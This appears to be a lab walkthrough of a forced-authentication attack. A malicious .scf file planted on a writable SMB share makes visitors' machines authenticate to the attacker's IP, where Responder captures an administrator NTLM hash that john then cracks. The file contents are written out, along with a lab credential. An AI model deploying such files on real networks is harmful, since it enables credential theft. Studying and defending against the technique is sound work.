Force Authentication
Allows attacker to gather credential material by forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
Exploitation
In this lab, we will use this credential saifullah:sPassword@123 to enumerate our target machine.
Let’s start by enumerating shares.

Here we have Read, Write permission on devops share. Which means we can upload a file to the share.
We will create a malicious file that will force the target machine to try to authenticate with our machine, which will allow us to obtain ntlm hash of the user.
1
2
3
4
5
6
7
[Shell]
Command=2
IconFile=\\10.42.0.1\\share\noexist.txt
[Taskbar]
Command=ToggleDesktop
Now we will save it in .scf file and then upload it to the devops share.

We will run responder and wait for someone to access the devops share.

We can retrieve the ntlm hash of anyone who accesses the devops share.
Let’s login to the victim machine and access the share.

Let’s go back to our machine and check it.

As you can see we have got ntlm hash of the administrator. We will save it and crack it using john.

We were able to recover the ntlm hash.